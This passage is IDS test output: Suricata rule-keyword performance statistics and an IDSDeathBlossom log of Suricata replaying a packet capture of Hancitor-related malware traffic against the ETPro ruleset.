  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          94360           24              5               5590            3931.00         3376.00         4077.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27483           9               0               3343            3053.00         0.00            3053.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          30713863        912             248             504532          33677.00        54976.00        25722.00       
  pcre             2390156         801             0               22806           2983.00         0.00            2983.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2238063         565             408             41925           3961.00         4063.00         3695.00        
  pcre             525664          73              35              61491           7200.00         6309.00         8021.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          291523          83              60              5028            3512.00         3487.00         3577.00        
  pcre             29630           5               5               11142           5926.00         5926.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             9708            1               0               9708            9708.00         0.00            9708.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32318           9               7               3878            3590.00         3541.00         3763.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          15306           4               4               4201            3826.00         3826.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          217926          63              55              4288            3459.00         3450.00         3518.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          337909          94              59              5340            3594.00         3781.00         3279.00        
  pcre             88116           18              18              11388           4895.00         4895.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3608            1               1               3608            3608.00         3608.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          38645           12              6               4009            3220.00         3037.00         3403.00        


IDSDeathBlossom.py.log - (1214 bytes) - download
1
2
3
4
5
6
7
8
2019-03-29 07:43:46,367 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-03-29 07:43:47,072 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-03-29 07:43:47,072 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-03-29 07:43:47,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-03-29 07:43:47,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-03-29 07:43:47,073 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/53c8dfa5c61083990e65afc5c20decf456b33745cb75ec8c950e11a498e082d2 -r /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap -vvv -k none
2019-03-29 07:44:08,306 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-03-29 07:44:08,307 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.9559938908